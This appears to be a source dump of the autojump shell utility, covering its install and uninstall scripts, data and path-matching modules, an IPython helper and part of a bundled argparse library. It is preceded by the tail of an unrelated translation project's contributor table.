](https://github.com/Vonng/ddia/pull/43) | [@baijinping](https://github.com/baijinping) | "更假简单"->"更加简单" | | [42 ](https://github.com/Vonng/ddia/pull/42) | [@tisonkun](https://github.com/tisonkun) | 修复 ch1 中的无序列表格式 | | [38 ](https://github.com/Vonng/ddia/pull/38) | [@renjie-c](https://github.com/renjie-c) | 纠正多处的翻译小错误 | | [37 ](https://github.com/Vonng/ddia/pull/37) | [@tankilo](https://github.com/tankilo) | fix translation mistakes in ch4.md | | [36 ](https://github.com/Vonng/ddia/pull/36) | [@wwek](https://github.com/wwek) | 1.修复多个链接错误 2.名词优化修订 3.错误修订 | | [35 ](https://github.com/Vonng/ddia/pull/35) | [@wwek](https://github.com/wwek) | fix ch7.md to ch8.md link error | | [34 ](https://github.com/Vonng/ddia/pull/34) | [@wwek](https://github.com/wwek) | Merge pull request #1 from Vonng/master | | [33 ](https://github.com/Vonng/ddia/pull/33) | [@wwek](https://github.com/wwek) | fix part-ii.md link error | | [32 ](https://github.com/Vonng/ddia/pull/32) | [@JCYoky](https://github.com/JCYoky) | Update ch2.md | | [31 ](https://github.com/Vonng/ddia/pull/31) | [@elsonLee](https://github.com/elsonLee) | Update ch7.md | | [26 ](https://github.com/Vonng/ddia/pull/26) | [@yjhmelody](https://github.com/yjhmelody) | 修复一些明显错误 | | [25 ](https://github.com/Vonng/ddia/pull/25) | [@lqbilbo](https://github.com/lqbilbo) | 修复链接错误 | | [24 ](https://github.com/Vonng/ddia/pull/24) | [@artiship](https://github.com/artiship) | 修改词语顺序 | | [23 ](https://github.com/Vonng/ddia/pull/23) | [@artiship](https://github.com/artiship) | 修正错别字 | | [22 ](https://github.com/Vonng/ddia/pull/22) | [@artiship](https://github.com/artiship) | 纠正翻译错误 | | [21 ](https://github.com/Vonng/ddia/pull/21) | [@zhtisi](https://github.com/zhtisi) | 修正目录和本章标题不符的情况 | | [20 ](https://github.com/Vonng/ddia/pull/20) | [@rentiansheng](https://github.com/rentiansheng) | Update ch7.md | | [19 ](https://github.com/Vonng/ddia/pull/19) | [@LHRchina](https://github.com/LHRchina) | 修复语句小bug | | [16 ](https://github.com/Vonng/ddia/pull/16) | [@MuAlex](https://github.com/MuAlex) | Master | | [15 ](https://github.com/Vonng/ddia/pull/15) | [@cg-zhou](https://github.com/cg-zhou) | Update translation progress | | [14 ](https://github.com/Vonng/ddia/pull/14) | [@cg-zhou](https://github.com/cg-zhou) | Translate glossary | | [13 ](https://github.com/Vonng/ddia/pull/13) | [@cg-zhou](https://github.com/cg-zhou) | 详细修改了后记中和印度野猪相关的描述 | | [12 ](https://github.com/Vonng/ddia/pull/12) | [@ibyte2011](https://github.com/ibyte2011) | 修改了部分翻译 | | [11 ](https://github.com/Vonng/ddia/pull/11) | [@jiajiadebug](https://github.com/jiajiadebug) | ch2 100% | | [10 ](https://github.com/Vonng/ddia/pull/10) | [@jiajiadebug](https://github.com/jiajiadebug) | ch2 20% | | [9 ](https://github.com/Vonng/ddia/pull/9) | [@jiajiadebug](https://github.com/jiajiadebug) | Preface, ch1, part-i translation minor fixes | | [7 ](https://github.com/Vonng/ddia/pull/7) | [@MuAlex](https://github.com/MuAlex) | Ch6 translation pull request | | [6 ](https://github.com/Vonng/ddia/pull/6) | [@MuAlex](https://github.com/MuAlex) | Ch6 change version1 | | [5 ](https://github.com/Vonng/ddia/pull/5) | [@nevertiree](https://github.com/nevertiree) | Chapter 01语法微调 | | [2 ](https://github.com/Vonng/ddia/pull/2) | [@seagullbird](https://github.com/seagullbird) | 序言初翻 | </details> --------- ## 协议 [![License: CC-BY 4.0](https://img.shields.io/github/license/Vonng/ddia?logo=opensourceinitiative&logoColor=green&color=slategray)](https://github.com/Vonng/ddia/blob/master/LICENSE)
autojump
ff75f542ae6ef94d93c456f3e37c555598664ca5
File: uninstall.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import os import platform import shutil import sys sys.path.append('bin') from autojump_argparse import ArgumentParser # noqa def is_empty_dir(path): """ Checks if any files are present within a directory and all sub-directories. """ for _, _, files in os.walk(path): if files: return False return True def parse_arguments(): default_clink_dir = os.path.join(os.getenv('LOCALAPPDATA', ''), 'clink') parser = ArgumentParser( description='Uninstalls autojump.', ) parser.add_argument( '-n', '--dryrun', action='store_true', default=False, help='simulate installation', ) parser.add_argument( '-u', '--userdata', action='store_true', default=False, help='delete user data', ) parser.add_argument( '-d', '--destdir', metavar='DIR', help='custom destdir', ) parser.add_argument( '-p', '--prefix', metavar='DIR', default='', help='custom prefix', ) parser.add_argument( '-z', '--zshshare', metavar='DIR', default='functions', help='custom zshshare', ) parser.add_argument( '-c', '--clinkdir', metavar='DIR', default=default_clink_dir, ) return parser.parse_args() def remove_custom_installation(args, dryrun=False): if not args.destdir: return bin_dir = os.path.join(args.destdir, args.prefix, 'bin') doc_dir = os.path.join(args.destdir, args.prefix, 'share', 'man', 'man1') etc_dir = os.path.join(args.destdir, 'etc', 'profile.d') share_dir = os.path.join(args.destdir, args.prefix, 'share', 'autojump') zshshare_dir = os.path.join(args.destdir, args.zshshare) if not os.path.exists(share_dir): return print('\nFound custom installation...') rm(os.path.join(bin_dir, 'autojump'), dryrun) rm(os.path.join(bin_dir, 'autojump_data.py'), dryrun) rm(os.path.join(bin_dir, 'autojump_utils.py'), dryrun) rm(os.path.join(bin_dir, 'autojump_argparse.py'), dryrun) if platform.system() == 'Windows': if os.path.exists(args.clinkdir): rm(os.path.join(args.clinkdir, 'autojump.lua'), dryrun) rm(os.path.join(bin_dir, 'autojump.bat'), dryrun) rm(os.path.join(bin_dir, 'j.bat'), dryrun) rm(os.path.join(bin_dir, 'jc.bat'), dryrun) rm(os.path.join(bin_dir, 'jco.bat'), dryrun) rm(os.path.join(bin_dir, 'jo.bat'), dryrun) else: rm(os.path.join(etc_dir, 'autojump.sh'), dryrun) rm(os.path.join(share_dir, 'autojump.bash'), dryrun) rm(os.path.join(share_dir, 'autojump.fish'), dryrun) rm(os.path.join(share_dir, 'autojump.tcsh'), dryrun) rm(os.path.join(share_dir, 'autojump.zsh'), dryrun) rm(os.path.join(zshshare_dir, '_j'), dryrun) rmdir(share_dir, dryrun) rm(os.path.join(doc_dir, 'autojump.1'), dryrun) if is_empty_dir(args.destdir): rmdir(args.destdir, dryrun) def remove_system_installation(dryrun=False): default_destdir = '/' default_prefix = '/usr/local' default_zshshare = '/usr/share/zsh/site-functions' bin_dir = os.path.join(default_destdir, default_prefix, 'bin') doc_dir = os.path.join( default_destdir, default_prefix, 'share', 'man', 'man1', ) etc_dir = os.path.join(default_destdir, 'etc', 'profile.d') share_dir = os.path.join( default_destdir, default_prefix, 'share', 'autojump', ) zshshare_dir = os.path.join(default_destdir, default_zshshare) if not os.path.exists(share_dir): return print('\nFound system installation...') if os.geteuid() != 0: print( 'Please rerun as root for system-wide uninstall, skipping...', file=sys.stderr, ) return rm(os.path.join(bin_dir, 'autojump'), dryrun) rm(os.path.join(bin_dir, 'autojump_data.py'), dryrun) rm(os.path.join(bin_dir, 'autojump_utils.py'), dryrun) rm(os.path.join(etc_dir, 'autojump.sh'), dryrun) rm(os.path.join(share_dir, 'autojump.bash'), dryrun) rm(os.path.join(share_dir, 'autojump.fish'), dryrun) rm(os.path.join(share_dir, 'autojump.tcsh'), dryrun) rm(os.path.join(share_dir, 'autojump.zsh'), dryrun) rm(os.path.join(zshshare_dir, '_j'), dryrun) rmdir(share_dir, dryrun) rm(os.path.join(doc_dir, 'autojump.1'), dryrun) def remove_user_data(dryrun=False): if platform.system() == 'Darwin': data_home = os.path.join( os.path.expanduser('~'), 'Library', 'autojump', ) elif platform.system() == 'Windows': data_home = os.path.join( os.getenv('APPDATA'), 'autojump', ) else: data_home = os.getenv( 'XDG_DATA_HOME', os.path.join( os.path.expanduser('~'), '.local', 'share', 'autojump', ), ) if os.path.exists(data_home): print('\nFound user data...') rmdir(data_home, dryrun) def remove_user_installation(dryrun=False): if platform.system() == 'Windows': default_destdir = os.path.join( os.getenv('LOCALAPPDATA', ''), 'autojump', ) clink_dir = os.path.join(os.getenv('LOCALAPPDATA', ''), 'clink') else: default_destdir = os.path.join(os.path.expanduser('~'), '.autojump') if os.path.exists(default_destdir): print('\nFound user installation...') rmdir(default_destdir, dryrun) if platform.system() == 'Windows' and os.path.exists(clink_dir): rm(os.path.join(clink_dir, 'autojump.lua'), dryrun) def rm(path, dryrun): if os.path.exists(path): print('deleting file:', path) if not dryrun: os.remove(path) def rmdir(path, dryrun): if os.path.exists(path): print('deleting directory:', path) if not dryrun: shutil.rmtree(path) def main(args): if args.dryrun: print('Uninstalling autojump (DRYRUN)...') else: print('Uninstalling autojump...') remove_user_installation(args.dryrun) remove_system_installation(args.dryrun) remove_custom_installation(args, args.dryrun) if args.userdata: remove_user_data(args.dryrun) if __name__ == '__main__': sys.exit(main(parse_arguments())) File: install.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import os import platform import shutil import sys sys.path.append('bin') from autojump_argparse import ArgumentParser # noqa SUPPORTED_SHELLS = ('bash', 'zsh', 'fish', 'tcsh') def cp(src, dest, dryrun=False): print('copying file: %s -> %s' % (src, dest)) if not dryrun: shutil.copy(src, dest) def get_shell(): return os.path.basename(os.getenv('SHELL', '')) def mkdir(path, dryrun=False): print('creating directory:', path) if not dryrun and not os.path.exists(path): os.makedirs(path) def modify_autojump_sh(etc_dir, share_dir, dryrun=False): """Append custom installation path to autojump.sh""" custom_install = '\ \n# check custom install \ \nif [ -s %s/autojump.${shell} ]; then \ \n source %s/autojump.${shell} \ \nfi\n' % (share_dir, share_dir) with open(os.path.join(etc_dir, 'autojump.sh'), 'a') as f: f.write(custom_install) def modify_autojump_lua(clink_dir, bin_dir, dryrun=False): """Prepend custom AUTOJUMP_BIN_DIR definition to autojump.lua""" custom_install = "local AUTOJUMP_BIN_DIR = \"%s\"\n" % bin_dir.replace( '\\', '\\\\', ) clink_file = os.path.join(clink_dir, 'autojump.lua') with open(clink_file, 'r') as f: original = f.read() with open(clink_file, 'w') as f: f.write(custom_install + original) def parse_arguments(): # noqa if platform.system() == 'Windows': default_user_destdir = os.path.join( os.getenv('LOCALAPPDATA', ''), 'autojump', ) else: default_user_destdir = os.path.join( os.path.expanduser('~'), '.autojump', ) default_user_prefix = '' default_user_zshshare = 'functions' default_system_destdir = '/' default_system_prefix = '/usr/local' default_system_zshshare = '/usr/share/zsh/site-functions' default_clink_dir = os.path.join(os.getenv('LOCALAPPDATA', ''), 'clink') parser = ArgumentParser( description='Installs autojump globally for root users, otherwise \ installs in current user\'s home directory.' ) parser.add_argument( '-n', '--dryrun', action='store_true', default=False, help='simulate installation', ) parser.add_argument( '-f', '--force', action='store_true', default=False, help='skip root user, shell type, Python version checks', ) parser.add_argument( '-d', '--destdir', metavar='DIR', default=default_user_destdir, help='set destination to DIR', ) parser.add_argument( '-p', '--prefix', metavar='DIR', default=default_user_prefix, help='set prefix to DIR', ) parser.add_argument( '-z', '--zshshare', metavar='DIR', default=default_user_zshshare, help='set zsh share destination to DIR', ) parser.add_argument( '-c', '--clinkdir', metavar='DIR', default=default_clink_dir, help='set clink directory location to DIR (Windows only)', ) parser.add_argument( '-s', '--system', action='store_true', default=False, help='install system wide for all users', ) args = parser.parse_args() if not args.force: if sys.version_info[0] == 2 and sys.version_info[1] < 6: print('Python v2.6+ or v3.0+ required.', file=sys.stderr) sys.exit(1) if args.system: if platform.system() == 'Windows': print( 'System-wide installation is not supported on Windows.', file=sys.stderr, ) sys.exit(1) elif os.geteuid() != 0: print( 'Please rerun as root for system-wide installation.', file=sys.stderr, ) sys.exit(1) if platform.system() != 'Windows' \ and get_shell() not in SUPPORTED_SHELLS: print( 'Unsupported shell: %s' % os.getenv('SHELL'), file=sys.stderr, ) sys.exit(1) if args.destdir != default_user_destdir \ or args.prefix != default_user_prefix \ or args.zshshare != default_user_zshshare: args.custom_install = True else: args.custom_install = False if args.system: if args.custom_install: print( 'Custom paths incompatible with --system option.', file=sys.stderr, ) sys.exit(1) args.destdir = default_system_destdir args.prefix = default_system_prefix args.zshshare = default_system_zshshare return args def show_post_installation_message(etc_dir, share_dir, bin_dir): if platform.system() == 'Windows': print('\nPlease manually add %s to your user path' % bin_dir) else: if get_shell() == 'fish': aj_shell = '%s/autojump.fish' % share_dir source_msg = 'if test -f %s; . %s; end' % (aj_shell, aj_shell) rcfile = '~/.config/fish/config.fish' else: aj_shell = '%s/autojump.sh' % etc_dir source_msg = '[[ -s %s ]] && source %s' % (aj_shell, aj_shell) if platform.system() == 'Darwin' and get_shell() == 'bash': rcfile = '~/.profile' else: rcfile = '~/.%src' % get_shell() print('\nPlease manually add the following line(s) to %s:' % rcfile) print('\n\t' + source_msg) if get_shell() == 'zsh': print('\n\tautoload -U compinit && compinit -u') print('\nPlease restart terminal(s) before running autojump.\n') def main(args): if args.dryrun: print('Installing autojump to %s (DRYRUN)...' % args.destdir) else: print('Installing autojump to %s ...' % args.destdir) bin_dir = os.path.join(args.destdir, args.prefix, 'bin') etc_dir = os.path.join(args.destdir, 'etc', 'profile.d') doc_dir = os.path.join(args.destdir, args.prefix, 'share', 'man', 'man1') share_dir = os.path.join(args.destdir, args.prefix, 'share', 'autojump') zshshare_dir = os.path.join(args.destdir, args.zshshare) mkdir(bin_dir, args.dryrun) mkdir(doc_dir, args.dryrun) mkdir(etc_dir, args.dryrun) mkdir(share_dir, args.dryrun) cp('./bin/autojump', bin_dir, args.dryrun) cp('./bin/autojump_argparse.py', bin_dir, args.dryrun) cp('./bin/autojump_data.py', bin_dir, args.dryrun) cp('./bin/autojump_match.py', bin_dir, args.dryrun) cp('./bin/autojump_utils.py', bin_dir, args.dryrun) cp('./bin/icon.png', share_dir, args.dryrun) cp('./docs/autojump.1', doc_dir, args.dryrun) if platform.system() == 'Windows': cp('./bin/autojump.lua', args.clinkdir, args.dryrun) cp('./bin/autojump.bat', bin_dir, args.dryrun) cp('./bin/j.bat', bin_dir, args.dryrun) cp('./bin/jc.bat', bin_dir, args.dryrun) cp('./bin/jo.bat', bin_dir, args.dryrun) cp('./bin/jco.bat', bin_dir, args.dryrun) if args.custom_install: modify_autojump_lua(args.clinkdir, bin_dir, args.dryrun) else: mkdir(etc_dir, args.dryrun) mkdir(share_dir, args.dryrun) mkdir(zshshare_dir, args.dryrun) cp('./bin/autojump.sh', etc_dir, args.dryrun) cp('./bin/autojump.bash', share_dir, args.dryrun) cp('./bin/autojump.fish', share_dir, args.dryrun) cp('./bin/autojump.zsh', share_dir, args.dryrun) cp('./bin/_j', zshshare_dir, args.dryrun) if args.custom_install: modify_autojump_sh(etc_dir, share_dir, args.dryrun) show_post_installation_message(etc_dir, share_dir, bin_dir) if __name__ == '__main__': sys.exit(main(parse_arguments())) File: tools/autojump_ipython.py # -*- coding: utf-8 -*- """ IPython autojump magic Written by keith hughitt <[email protected]>, based on an earlier version by Mario Pastorelli <[email protected]>. To install, create a new IPython user profile by running: ipython profile create And copy this file into the "startup" folder of your new profile (e.g. "$HOME/.config/ipython/profile_default/startup/"). @TODO: extend %cd to call "autojump -a" """ from subprocess import PIPE from subprocess import Popen from IPython.core.magic import register_line_magic ip = get_ipython() # noqa @register_line_magic def j(path): cmd = ['autojump'] + path.split() newpath = Popen( cmd, stdout=PIPE, shell=False, ).communicate()[0].strip() if newpath: ip.magic('cd %s' % newpath.decode('utf-8')) # remove from namespace del j File: bin/autojump_data.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import os import shutil import sys from codecs import open from collections import namedtuple from tempfile import NamedTemporaryFile from time import time from autojump_utils import create_dir from autojump_utils import is_osx from autojump_utils import is_python3 from autojump_utils import move_file from autojump_utils import unico if sys.version_info[0] == 3: ifilter = filter imap = map else: from itertools import ifilter # noqa from itertools import imap # noqa BACKUP_THRESHOLD = 24 * 60 * 60 Entry = namedtuple('Entry', ['path', 'weight']) def dictify(entries): """ Converts a list of entries into a dictionary where key = path value = weight """ result = {} for entry in entries: result[entry.path] = entry.weight return result def entriefy(data): """Converts a dictionary into an iterator of entries.""" convert = lambda tup: Entry(*tup) if is_python3(): return map(convert, data.items()) return imap(convert, data.iteritems()) def load(config): """Returns a dictonary (key=path, value=weight) loaded from data file.""" xdg_aj_home = os.path.join( os.path.expanduser('~'), '.local', 'share', 'autojump', ) if is_osx() and os.path.exists(xdg_aj_home): migrate_osx_xdg_data(config) if not os.path.exists(config['data_path']): return {} # example: u'10.0\t/home/user\n' -> ['10.0', u'/home/user'] parse = lambda line: line.strip().split('\t') correct_length = lambda x: len(x) == 2 # example: ['10.0', u'/home/user'] -> (u'/home/user', 10.0) tupleize = lambda x: (x[1], float(x[0])) try: with open( config['data_path'], 'r', encoding='utf-8', errors='replace', ) as f: return dict( imap( tupleize, ifilter(correct_length, imap(parse, f)), ), ) except (IOError, EOFError): return load_backup(config) def load_backup(config): if os.path.exists(config['backup_path']): move_file(config['backup_path'], config['data_path']) return load(config) return {} def migrate_osx_xdg_data(config): """ Older versions incorrectly used Linux XDG_DATA_HOME paths on OS X. This migrates autojump files from ~/.local/share/autojump to ~/Library/autojump """ assert is_osx(), 'This function should only be run on OS X.' xdg_data_home = os.path.join(os.path.expanduser('~'), '.local', 'share') xdg_aj_home = os.path.join(xdg_data_home, 'autojump') data_path = os.path.join(xdg_aj_home, 'autojump.txt') backup_path = os.path.join(xdg_aj_home, 'autojump.txt.bak') if os.path.exists(data_path): move_file(data_path, config['data_path']) if os.path.exists(backup_path): move_file(backup_path, config['backup_path']) # cleanup shutil.rmtree(xdg_aj_home) if len(os.listdir(xdg_data_home)) == 0: shutil.rmtree(xdg_data_home) def save(config, data): """Save data and create backup, creating a new data file if necessary.""" data_dir = os.path.dirname(config['data_path']) create_dir(data_dir) # atomically save by writing to temporary file and moving to destination try: temp = NamedTemporaryFile(delete=False, dir=data_dir) # Windows cannot reuse the same open file name temp.close() with open(temp.name, 'w', encoding='utf-8', errors='replace') as f: for path, weight in data.items(): f.write(unico('%s\t%s\n' % (weight, path))) f.flush() os.fsync(f) except IOError as ex: print('Error saving autojump data (disk full?)' % ex, file=sys.stderr) sys.exit(1) # move temp_file -> autojump.txt move_file(temp.name, config['data_path']) # create backup file if it doesn't exist or is older than BACKUP_THRESHOLD if not os.path.exists(config['backup_path']) or \ (time() - os.path.getmtime(config['backup_path']) > BACKUP_THRESHOLD): # noqa shutil.copy(config['data_path'], config['backup_path']) File: bin/autojump_utils.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- from __future__ import print_function import errno import os import platform import re import shutil import sys import unicodedata from itertools import islice if sys.version_info[0] == 3: imap = map os.getcwdu = os.getcwd else: from itertools import imap def create_dir(path): """Creates a directory atomically.""" try: os.makedirs(path) except OSError as exception: if exception.errno != errno.EEXIST: raise def encode_local(string): """Converts string into user's preferred encoding.""" if is_python3(): return string return string.encode(sys.getfilesystemencoding() or 'utf-8') def first(xs): it = iter(xs) try: if is_python3(): return it.__next__() return it.next() except StopIteration: return None def get_tab_entry_info(entry, separator): """ Given a tab entry in the following format return needle, index, and path: [needle]__[index]__[path] """ needle, index, path = None, None, None match_needle = re.search(r'(.*?)' + separator, entry) match_index = re.search(separator + r'([0-9]{1})', entry) match_path = re.search( separator + r'[0-9]{1}' + separator + r'(.*)', entry, ) if match_needle: needle = match_needle.group(1) if match_index: index = int(match_index.group(1)) if match_path: path = match_path.group(1) return needle, index, path def get_pwd(): try: return os.getcwdu() except OSError: print('Current directory no longer exists.', file=sys.stderr) raise def has_uppercase(string): if is_python3(): return any(ch.isupper() for ch in string) return any(unicodedata.category(c) == 'Lu' for c in unicode(string)) def in_bash(): return 'bash' in os.getenv('SHELL') def is_autojump_sourced(): return '1' == os.getenv('AUTOJUMP_SOURCED') def is_python2(): return sys.version_info[0] == 2 def is_python3(): return sys.version_info[0] == 3 def is_linux(): return platform.system() == 'Linux' def is_osx(): return platform.system() == 'Darwin' def is_windows(): return platform.system() == 'Windows' def last(xs): it = iter(xs) tmp = None try: if is_python3(): while True: tmp = it.__next__() else: while True: tmp = it.next() except StopIteration: return tmp def move_file(src, dst): """ Atomically move file. Windows does not allow for atomic file renaming (which is used by os.rename / shutil.move) so destination paths must first be deleted. """ if is_windows() and os.path.exists(dst): # raises exception if file is in use on Windows os.remove(dst) shutil.move(src, dst) def print_entry(entry): print_local('%.1f:\t%s' % (entry.weight, entry.path)) def print_local(string): print(encode_local(string)) def print_tab_menu(needle, tab_entries, separator): """ Prints the tab completion menu according to the following format: [needle]__[index]__[possible_match] The needle (search pattern) and index are necessary to recreate the results on subsequent calls. """ for i, entry in enumerate(tab_entries): print_local( '%s%s%d%s%s' % ( needle, separator, i + 1, separator, entry.path, ), ) def sanitize(directories): # edge case to allow '/' as a valid path clean = lambda x: unico(x) if x == os.sep else unico(x).rstrip(os.sep) return list(imap(clean, directories)) def second(xs): it = iter(xs) try: if is_python2(): it.next() return it.next() elif is_python3(): next(it) return next(it) except StopIteration: return None def surround_quotes(string): """ Bash has problems dealing with certain paths so we're surrounding all path outputs with quotes. """ if in_bash() and string: # Python 2.6 requres field numbers return '"{0}"'.format(string) return string def take(n, iterable): """Return first n items of an iterable.""" return islice(iterable, n) def unico(string): """Converts into Unicode string.""" if is_python2() and not isinstance(string, unicode): return unicode(string, encoding='utf-8', errors='replace') return string File: bin/autojump_match.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import re from difflib import SequenceMatcher from autojump_utils import is_python3 from autojump_utils import last if is_python3(): # pragma: no cover ifilter = filter imap = map os.getcwdu = os.getcwd else: from itertools import ifilter from itertools import imap def match_anywhere(needles, haystack, ignore_case=False): """ Matches needles anywhere in the path as long as they're in the same (but not necessary consecutive) order. For example: needles = ['foo', 'baz'] regex needle = r'.*foo.*baz.*' haystack = [ (path='/foo/bar/baz', weight=10), (path='/baz/foo/bar', weight=10), (path='/foo/baz', weight=10), ] result = [ (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), ] """ regex_needle = '.*' + '.*'.join(imap(re.escape, needles)) + '.*' regex_flags = re.IGNORECASE | re.UNICODE if ignore_case else re.UNICODE found = lambda haystack: re.search( regex_needle, haystack.path, flags=regex_flags, ) return ifilter(found, haystack) def match_consecutive(needles, haystack, ignore_case=False): """ Matches consecutive needles at the end of a path. For example: needles = ['foo', 'baz'] haystack = [ (path='/foo/bar/baz', weight=10), (path='/foo/baz/moo', weight=10), (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), ] # We can't actually use re.compile because of re.UNICODE regex_needle = re.compile(r''' foo # needle #1 [^/]* # all characters except os.sep zero or more times / # os.sep [^/]* # all characters except os.sep zero or more times baz # needle #2 [^/]* # all characters except os.sep zero or more times $ # end of string ''') result = [ (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), ] """ regex_no_sep = '[^' + os.sep + ']*' regex_no_sep_end = regex_no_sep + '$' regex_one_sep = regex_no_sep + os.sep + regex_no_sep regex_needle = regex_one_sep.join(imap(re.escape, needles)) + regex_no_sep_end regex_flags = re.IGNORECASE | re.UNICODE if ignore_case else re.UNICODE found = lambda entry: re.search( regex_needle, entry.path, flags=regex_flags, ) return ifilter(found, haystack) def match_fuzzy(needles, haystack, ignore_case=False, threshold=0.6): """ Performs an approximate match with the last needle against the end of every path past an acceptable threshold. For example: needles = ['foo', 'bar'] haystack = [ (path='/foo/bar/baz', weight=11), (path='/foo/baz/moo', weight=10), (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), (path='/foo/bar', weight=10), ] result = [ (path='/foo/bar/baz', weight=11), (path='/moo/foo/baz', weight=10), (path='/foo/baz', weight=10), (path='/foo/bar', weight=10), ] This is a weak heuristic and used as a last resort to find matches. """ end_dir = lambda path: last(os.path.split(path)) if ignore_case: needle = last(needles).lower() match_percent = lambda entry: SequenceMatcher( a=needle, b=end_dir(entry.path.lower()), ).ratio() else: needle = last(needles) match_percent = lambda entry: SequenceMatcher( a=needle, b=end_dir(entry.path), ).ratio() meets_threshold = lambda entry: match_percent(entry) >= threshold return ifilter(meets_threshold, haystack) File: bin/autojump_argparse.py # -*- coding: utf-8 -*- # Author: Steven J. Bethard <[email protected]>. # flake8: noqa """Command-line parsing library This module is an optparse-inspired command-line parsing library that: - handles both optional and positional arguments - produces highly informative usage messages - supports parsers that dispatch to sub-parsers The following is a simple usage example that sums integers from the command-line and writes the result to a file:: parser = argparse.ArgumentParser( description='sum the integers at the command line') parser.add_argument( 'integers', metavar='int', nargs='+', type=int, help='an integer to be summed') parser.add_argument( '--log', default=sys.stdout, type=argparse.FileType('w'), help='the file where the sum should be written') args = parser.parse_args() args.log.write('%s' % sum(args.integers)) args.log.close() The module contains the following public classes: - ArgumentParser -- The main entry point for command-line parsing. As the example above shows, the add_argument() method is used to populate the parser with actions for optional and positional arguments. Then the parse_args() method is invoked to convert the args at the command-line into an object with attributes. - ArgumentError -- The exception raised by ArgumentParser objects when there are errors with the parser's actions. Errors raised while parsing the command-line are caught by ArgumentParser and emitted as command-line messages. - FileType -- A factory for defining types of files to be created. As the example above shows, instances of FileType are typically passed as the type= argument of add_argument() calls. - Action -- The base class for parser actions. Typically actions are selected by passing strings like 'store_true' or 'append_const' to the action= argument of add_argument(). However, for greater customization of ArgumentParser actions, subclasses of Action may be defined and passed as the action= argument. - HelpFormatter, RawDescriptionHelpFormatter, RawTextHelpFormatter, ArgumentDefaultsHelpFormatter -- Formatter classes which may be passed as the formatter_class= argument to the ArgumentParser constructor. HelpFormatter is the default, RawDescriptionHelpFormatter and RawTextHelpFormatter tell the parser not to change the formatting for help text, and ArgumentDefaultsHelpFormatter adds information about argument defaults to the help. All other classes in this module are considered implementation details. (Also note that HelpFormatter and RawDescriptionHelpFormatter are only considered public as object names -- the API of the formatter objects is still considered an implementation detail.) """ __version__ = '1.2.1' __all__ = [ 'ArgumentParser', 'ArgumentError', 'ArgumentTypeError', 'FileType', 'HelpFormatter', 'ArgumentDefaultsHelpFormatter', 'RawDescriptionHelpFormatter', 'RawTextHelpFormatter', 'Namespace', 'Action', 'ONE_OR_MORE', 'OPTIONAL', 'PARSER', 'REMAINDER', 'SUPPRESS', 'ZERO_OR_MORE', ] import copy as _copy import os as _os import re as _re import sys as _sys import textwrap as _textwrap from gettext import gettext as _ try: set except NameError: # for python < 2.4 compatibility (sets module is there since 2.3): from sets import Set as set try: basestring except NameError: basestring = str try: sorted except NameError: # for python < 2.4 compatibility: def sorted(iterable, reverse=False): result = sorted(iterable) if reverse: result.reverse() return result def _callable(obj): return hasattr(obj, '__call__') or hasattr(obj, '__bases__') SUPPRESS = '==SUPPRESS==' OPTIONAL = '?' ZERO_OR_MORE = '*' ONE_OR_MORE = '+' PARSER = 'A...' REMAINDER = '...' _UNRECOGNIZED_ARGS_ATTR = '_unrecognized_args' # ============================= # Utility functions and classes # ============================= class _AttributeHolder(object): """Abstract base class that provides __repr__. The __repr__ method returns a string in the format:: ClassName(attr=name, attr=name, ...) The attributes are determined either by a class-level attribute, '_kwarg_names', or by inspecting the instance __dict__. """ def __repr__(self): type_name = type(self).__name__ arg_strings = [] for arg in self._get_args(): arg_strings.append(repr(arg)) for name, value in self._get_kwargs(): arg_strings.append('%s=%r' % (name, value)) return '%s(%s)' % (type_name, ', '.join(arg_strings)) def _get_kwargs(self): return sorted(self.__dict__.items()) def _get_args(self): return [] def _ensure_value(namespace, name, value): if getattr(namespace, name, None) is None: setattr(namespace, name, value) return getattr(namespace, name) # =============== # Formatting Help # =============== class HelpFormatter(object): """Formatter for generating usage messages and argument help strings. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def __init__( self, prog, indent_increment=2, max_help_position=24, width=None, ): # default setting for width if width is None: try: width = int(_os.environ['COLUMNS']) except (KeyError, ValueError): width = 80 width -= 2 self._prog = prog self._indent_increment = indent_increment self._max_help_position = max_help_position self._width = width self._current_indent = 0 self._level = 0 self._action_max_length = 0 self._root_section = self._Section(self, None) self._current_section = self._root_section self._whitespace_matcher = _re.compile(r'\s+') self._long_break_matcher = _re.compile(r'\n\n\n+') # =============================== # Section and indentation methods # =============================== def _indent(self): self._current_indent += self._indent_increment self._level += 1 def _dedent(self): self._current_indent -= self._indent_increment assert self._current_indent >= 0, 'Indent decreased below 0.' self._level -= 1 class _Section(object): def __init__(self, formatter, parent, heading=None): self.formatter = formatter self.parent = parent self.heading = heading self.items = [] def format_help(self): # format the indented section if self.parent is not None: self.formatter._indent() join = self.formatter._join_parts for func, args in self.items: func(*args) item_help = join([func(*args) for func, args in self.items]) if self.parent is not None: self.formatter._dedent() # return nothing if the section was empty if not item_help: return '' # add the heading if the section was non-empty if self.heading is not SUPPRESS and self.heading is not None: current_indent = self.formatter._current_indent heading = '%*s%s:\n' % (current_indent, '', self.heading) else: heading = '' # join the section-initial newline, the heading and the help return join(['\n', heading, item_help, '\n']) def _add_item(self, func, args): self._current_section.items.append((func, args)) # ======================== # Message building methods # ======================== def start_section(self, heading): self._indent() section = self._Section(self, self._current_section, heading) self._add_item(section.format_help, []) self._current_section = section def end_section(self): self._current_section = self._current_section.parent self._dedent() def add_text(self, text): if text is not SUPPRESS and text is not None: self._add_item(self._format_text, [text]) def add_usage(self, usage, actions, groups, prefix=None): if usage is not SUPPRESS: args = usage, actions, groups, prefix self._add_item(self._format_usage, args) def add_argument(self, action): if action.help is not SUPPRESS: # find all invocations get_invocation = self._format_action_invocation invocations = [get_invocation(action)] for subaction in self._iter_indented_subactions(action): invocations.append(get_invocation(subaction)) # update the maximum item length invocation_length = max([len(s) for s in invocations]) action_length = invocation_length + self._current_indent self._action_max_length = max( self._action_max_length, action_length, ) # add the item to the list self._add_item(self._format_action, [action]) def add_arguments(self, actions): for action in actions: self.add_argument(action) # ======================= # 